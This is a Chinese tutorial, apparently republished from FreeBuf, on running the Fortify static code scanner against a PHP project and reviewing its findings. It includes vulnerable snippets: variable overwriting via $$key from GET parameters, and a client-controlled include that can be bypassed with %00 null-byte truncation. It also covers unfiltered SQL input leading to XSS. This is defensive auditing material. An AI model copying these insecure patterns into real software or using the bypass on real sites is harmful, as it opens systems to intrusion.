商业级别fortify白盒神器介绍与使用分析-PHP Tutorial-php.cn

Home

Backend Development

PHP Tutorial

商业级别fortify白盒神器介绍与使用分析

WBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWBOYWB

Jun 20, 2016 pm 12:37 PM

1.什么是fortify它又能干些什么？

答：fottify全名叫：Fortify SCA ，是HP的产品，是一个静态的、白盒的软件源代码安全测试工具。它通过内置的五大主要分析引擎：数据流、语义、结构、控制流、配置流等对应用软件的源代码进行静态的分析，分析的过程中与它特有的软件安全漏洞规则集进行全面地匹配、查找，从而将源代码中存在的安全漏洞扫描出来，并给予整理报告。

2.它支持扫描多少种语言？

答：FortifySCA支持的21语言，分别是：

1. asp.net     2. VB.Net     3. c#.Net     4. ASP     5. VBscript     6. VS6     7.java     8.JSP     9.javascript     10. HTML     11. XML     12. C/C++     13.PHP     14.T-SQL     15.PL/SQL     16. Action script      17. Object-C (iphone-2012/5)     18. ColdFusion5.0 - 选购     19. python -选购     20. COBOL - 选购     21.SAP-ABAP -选购

3.他是免费的吗？

答：不是，是收费的。当然网上也没有破解的。貌似他一个月收费10万。

4.如何使用？

安装fortify之后，打开

界面：

选择高级扫描

他问要不要更新？我就选择No,因为这是我私人的，我是在2015年7月份购买的试用期为1个月。怕更新了就用不了了。如果你购买了可以选择YES。

选择之后出现如下界面

浏览意思是：扫描之后保存的结果保存在哪个路径。

然后点击下一步。

参数说明：

enable clean :把上一次的扫描结果清楚，除非换一个build ID,不然中间文件可能对下一次扫描产生影响。enable translation: 转换，把源码代码转换成nst文件-64： 是扫描64位的模式，sca默认扫描是32位模式。-Xmx4000m:4000M大概是4G，制定内存数-Xmx4G ：也可以用G定义这个参数建议加-encoding: 定制编码，UTF-8比较全，工具解析代码的时候指定字符集转换的比较好，建议加，如果中文注释不加会是乱码。-diable-source-:rendering:不加载与漏洞无关的代码到审计平台上，不建议加，这样代码显示不全。

然后点击下一步

它说：这是一个J2EE Web应用

选择No （因为你扫的是PHP）

然后scan（开始扫描）

Always run in background 意思:总是在后台运行

run in background 意思：后台运行

cancel 意思：取消

Details 意思：细节

扫完之后：

none 代表其他 1个

A1 注入 7个

A3 xss 37个

A4 不安全的直接对象引用 35个

A6 敏感数据暴露 4个

A10 未验证的重定向和转发 2个

如果发现是英文的，想改成如下方法中文：

以下是官网提供的分析图：

分析漏洞：

none漏洞：

这是一个可变变量，按照中国人说法简称：“变量覆盖”。

讲一下这个漏洞的原理：

可变变量

$first ="hello";$hello ="world";echo $first." ".$$first;

结果是 hello world

$$first就是$hello，因为$first的值是hello

———————————但是在foreach 就不一样了—————————————————–

<?php$a = 'sss';foreach ($_GET as $key => $value) {     //如果在foreach那就不一样了     echo $$key;  //将$$区分开 然后$key 等于键 然后开始合并 比如打开http://www.com.com/demo.php?a=值 就变成了$a  因为$key的键是a 所以就变成了$a     $$key = $value;//$a = 值  替换变量    }echo '<hr '>';echo $a;?>

A1 注入漏洞：

发现$c变量是由客户端进行GET请求控制的。

safe_replace函数过滤如下字符：

function safe_replace($string) {$string = str_replace('%20','',$string);$string = str_replace('%27','',$string);$string = str_replace('%2527','',$string);$string = str_replace('*','',$string);$string = str_replace('"','"',$string);$string = str_replace("'",'',$string);$string = str_replace('"','',$string);$string = str_replace(';','',$string);$string = str_replace('<','<',$string);$string = str_replace('>','>',$string);$string = str_replace("{",'',$string);$string = str_replace('}','',$string);$string = str_replace('//','',$string);return $string;}

include $c.".php"; 但是后面有个.php是拼接的。

但是如果 php版本小于5.3.40 可以采用空字节也就是%00的二进制视作字符串的结束，按照其他说法的话也就是截断。。。。。

A3 xss 漏洞

$field_sql="update ".DB_PRE."member set {$field_sql} where userid={$last_id}";$query=$this->mysql->query($field_sql);

写入数据库的时候没有任何限制或者输出的时候没有做任何的过滤就直接输出导致造成了XSS。（我就不一一解释了）

A4 不安全的直接对象引用漏洞

文件上传次数未做策略，可导致攻击。

A6 敏感数据暴露漏洞：

A10 未验证的重定向和转发漏洞：

这里我就不去定位看谁使用这个函数了，懂点PHP的人相信都懂。。

整个过程基本已经结束了，但是有点我想提醒大家，在设置内存的时候如果你不设置内存他会自动帮你设置，比如你的电脑内存是8G 他就自动设置为8G 然后就会占用你8G内存，然后搞得你电脑卡卡卡卡卡卡卡的。下次扫之前记得要设置你的内存，如果你电脑是8G内存设置7G就好了，还剩下1G就可以玩4399小小游戏了。 ~_~

* 投稿 作者：心东， 转自须注明来自FreeBuf黑客与极客（FreeBuf.COM）

Statement

The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn

The Continued Use of PHP: Reasons for Its EnduranceApr 19, 2025 am 12:23 AM

What’s still popular is the ease of use, flexibility and a strong ecosystem. 1) Ease of use and simple syntax make it the first choice for beginners. 2) Closely integrated with web development, excellent interaction with HTTP requests and database. 3) The huge ecosystem provides a wealth of tools and libraries. 4) Active community and open source nature adapts them to new needs and technology trends.

PHP and Python: Exploring Their Similarities and DifferencesApr 19, 2025 am 12:21 AM

PHP and Python are both high-level programming languages that are widely used in web development, data processing and automation tasks. 1.PHP is often used to build dynamic websites and content management systems, while Python is often used to build web frameworks and data science. 2.PHP uses echo to output content, Python uses print. 3. Both support object-oriented programming, but the syntax and keywords are different. 4. PHP supports weak type conversion, while Python is more stringent. 5. PHP performance optimization includes using OPcache and asynchronous programming, while Python uses cProfile and asynchronous programming.

PHP and Python: Different Paradigms ExplainedApr 18, 2025 am 12:26 AM

PHP is mainly procedural programming, but also supports object-oriented programming (OOP); Python supports a variety of paradigms, including OOP, functional and procedural programming. PHP is suitable for web development, and Python is suitable for a variety of applications such as data analysis and machine learning.

PHP and Python: A Deep Dive into Their HistoryApr 18, 2025 am 12:25 AM

PHP originated in 1994 and was developed by RasmusLerdorf. It was originally used to track website visitors and gradually evolved into a server-side scripting language and was widely used in web development. Python was developed by Guidovan Rossum in the late 1980s and was first released in 1991. It emphasizes code readability and simplicity, and is suitable for scientific computing, data analysis and other fields.

Choosing Between PHP and Python: A GuideApr 18, 2025 am 12:24 AM

PHP is suitable for web development and rapid prototyping, and Python is suitable for data science and machine learning. 1.PHP is used for dynamic web development, with simple syntax and suitable for rapid development. 2. Python has concise syntax, is suitable for multiple fields, and has a strong library ecosystem.

PHP and Frameworks: Modernizing the LanguageApr 18, 2025 am 12:14 AM

PHP remains important in the modernization process because it supports a large number of websites and applications and adapts to development needs through frameworks. 1.PHP7 improves performance and introduces new features. 2. Modern frameworks such as Laravel, Symfony and CodeIgniter simplify development and improve code quality. 3. Performance optimization and best practices further improve application efficiency.

PHP's Impact: Web Development and BeyondApr 18, 2025 am 12:10 AM

PHPhassignificantlyimpactedwebdevelopmentandextendsbeyondit.1)ItpowersmajorplatformslikeWordPressandexcelsindatabaseinteractions.2)PHP'sadaptabilityallowsittoscaleforlargeapplicationsusingframeworkslikeLaravel.3)Beyondweb,PHPisusedincommand-linescrip

How does PHP type hinting work, including scalar types, return types, union types, and nullable types?Apr 17, 2025 am 12:25 AM

PHP type prompts to improve code quality and readability. 1) Scalar type tips: Since PHP7.0, basic data types are allowed to be specified in function parameters, such as int, float, etc. 2) Return type prompt: Ensure the consistency of the function return value type. 3) Union type prompt: Since PHP8.0, multiple types are allowed to be specified in function parameters or return values. 4) Nullable type prompt: Allows to include null values and handle functions that may return null values.

See all articles